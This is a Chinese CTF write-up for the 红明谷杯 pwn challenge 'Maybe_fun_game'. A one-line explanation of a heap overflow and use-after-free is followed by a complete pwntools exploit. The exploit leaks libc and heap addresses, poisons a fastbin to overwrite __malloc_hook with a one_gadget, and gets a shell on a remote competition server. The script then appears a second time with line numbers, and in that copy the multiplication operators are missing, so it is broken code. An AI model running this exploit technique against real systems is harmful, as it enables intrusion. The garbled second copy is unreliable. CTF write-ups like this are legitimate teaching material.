2021-04-04

红明谷杯

……会逆向就会做;

Maybe_fun_game

存在堆溢出和UAF,利用堆溢出修改chunk大小,让他进入unsorted bin而不是top,切割泄漏libc地址,然后就是UAF打__malloc_hook

from pwn import*
import base64
#context.log_level = 'DEBUG'
def get_argv(recv_string,string):
	#gdb.attach(p,"b *(0x555555554000+0x1348)")
	p.sendafter(recv_string,base64.b64encode(p32(0x12345678)*2 + p64(0x30) + p64(8) + p64(0x8) + 'A'*8 + string))
def Create(size,content):
	get_argv('Pg==','1')
	get_argv('emUgPj4=',str(size))
	get_argv('bnQgPj4=',content)
def Free():
	get_argv('Pg==','2')
def Edit(content):
	get_argv('Pg==','3')
	get_argv('bnQgPj4=',content)
def View():
	get_argv('Pg==','4')
p = process('./main')
libc =ELF('./libc-2.23.so')
p = remote('8.140.179.11',13452)
Create(0x20,'FMYY')
get_argv('Pg==','1')
get_argv('emUgPj4=',str(0x1000))
get_argv('Pg==','3')
#gdb.attach(p,"b *(0x555555554000+0xD10)")
payload = '\x00'*0x28 + p64(0x3A1) + '\x00'*0x378 + p64(0x21) + '\x00'*0x18  + p64(0x791) + '\x00'*0x788 + p64(0x781)
p.sendafter('bnQgPj4=',base64.b64encode(p32(0x12345678)*2 + p64(0xF30) + p64(8) + p64(0xF08) + 'A'*8 + payload))
Create(0x20,'\x78')
View()
p.recvline()
data = base64.b64decode(p.recvline())
libc_base = u64(data[-6:].ljust(8,'\x00')) - libc.sym['__malloc_hook'] - 0x68 #+ 0x100000000
log.info('LIBC:\t' + hex(libc_base))
Create(0x10,'\x10')
View()
p.recvline()
data = base64.b64decode(p.recvline())
heap_base = u64(data[-6:].ljust(8,'\x00')) - 0xA10
log.info('HEAP:\t' + hex(heap_base))

get_argv('Pg==','3')
p.sendafter('bnQgPj4=',base64.b64encode(p32(0x12345678)*2 + p64(0) + p64(0x68) + p64(0x68) + 'A'*8 + 'FMYY' + '\n'))


Create(0x60,p64(libc_base + libc.sym['__malloc_hook'] - 0x23))
Create(0x60,'FMYY')
Create(0x60,'FMYY')
Create(0x60,'FMYY')
get_argv('Pg==','3')
p.sendafter('bnQgPj4=',base64.b64encode(p32(0x12345678)*2 + p64(0x50) + p64(0x8) + p64(0x28) + 'A'*8 + '\x00'*0x13 + p64(libc_base + 0xF1207) + '\n'))

p.interactive()

1	from pwn import*
2	import base64
3	#context.log_level = 'DEBUG'
4	def get_argv(recv_string,string):
5	#gdb.attach(p,"b *(0x555555554000+0x1348)")
6	p.sendafter(recv_string,base64.b64encode(p32(0x12345678)2 + p64(0x30) + p64(8) + p64(0x8) + 'A'8 + string))
7	def Create(size,content):
8	get_argv('Pg==','1')
9	get_argv('emUgPj4=',str(size))
10	get_argv('bnQgPj4=',content)
11	def Free():
12	get_argv('Pg==','2')
13	def Edit(content):
14	get_argv('Pg==','3')
15	get_argv('bnQgPj4=',content)
16	def View():
17	get_argv('Pg==','4')
18	p = process('./main')
19	libc =ELF('./libc-2.23.so')
20	p = remote('8.140.179.11',13452)
21	Create(0x20,'FMYY')
22	get_argv('Pg==','1')
23	get_argv('emUgPj4=',str(0x1000))
24	get_argv('Pg==','3')
25	#gdb.attach(p,"b *(0x555555554000+0xD10)")
26	payload = '\x00'0x28 + p64(0x3A1) + '\x00'0x378 + p64(0x21) + '\x00'0x18 + p64(0x791) + '\x00'0x788 + p64(0x781)
27	p.sendafter('bnQgPj4=',base64.b64encode(p32(0x12345678)2 + p64(0xF30) + p64(8) + p64(0xF08) + 'A'8 + payload))
28	Create(0x20,'\x78')
29	View()
30	p.recvline()
31	data = base64.b64decode(p.recvline())
32	libc_base = u64(data[-6:].ljust(8,'\x00')) - libc.sym['__malloc_hook'] - 0x68 #+ 0x100000000
33	log.info('LIBC:\t' + hex(libc_base))
34	Create(0x10,'\x10')
35	View()
36	p.recvline()
37	data = base64.b64decode(p.recvline())
38	heap_base = u64(data[-6:].ljust(8,'\x00')) - 0xA10
39	log.info('HEAP:\t' + hex(heap_base))
40
41	get_argv('Pg==','3')
42	p.sendafter('bnQgPj4=',base64.b64encode(p32(0x12345678)2 + p64(0) + p64(0x68) + p64(0x68) + 'A'8 + 'FMYY' + '\n'))
43
44
45	Create(0x60,p64(libc_base + libc.sym['__malloc_hook'] - 0x23))
46	Create(0x60,'FMYY')
47	Create(0x60,'FMYY')
48	Create(0x60,'FMYY')
49	get_argv('Pg==','3')
50	p.sendafter('bnQgPj4=',base64.b64encode(p32(0x12345678)2 + p64(0x50) + p64(0x8) + p64(0x28) + 'A'8 + '\x00'*0x13 + p64(libc_base + 0xF1207) + '\n'))
51
52	p.interactive()